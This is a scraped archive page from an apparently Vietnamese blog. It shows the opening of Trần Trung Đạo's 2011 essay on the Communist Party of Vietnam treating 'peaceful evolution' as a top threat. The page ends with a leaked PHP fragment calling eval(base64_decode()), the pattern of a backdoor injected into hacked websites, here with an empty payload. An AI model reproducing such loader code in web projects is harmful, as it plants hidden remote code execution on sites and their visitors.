Archive for December 25th, 2011

Trần Trung Đạo: Diễn biến, chống diễn biến và tự diễn biến hòa bình

Trần Trung Đạo: Diễn biến, chống diễn biến và tự diễn biến hòa bình

Tháng 4/1994, trước làn sóng cách mạng dân chủ diễn ra tại Đông Âu, “diễn biến hòa bình” vốn là một đe dọa, đã được Trung ương Đảng Cộng Sản Việt Nam đưa lên hàng nguy cơ, và là một trong bốn nguy cơ hàng đầu trong Báo cáo

12.25.2011 | Tiểu Luận- Chính Luận |

5 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>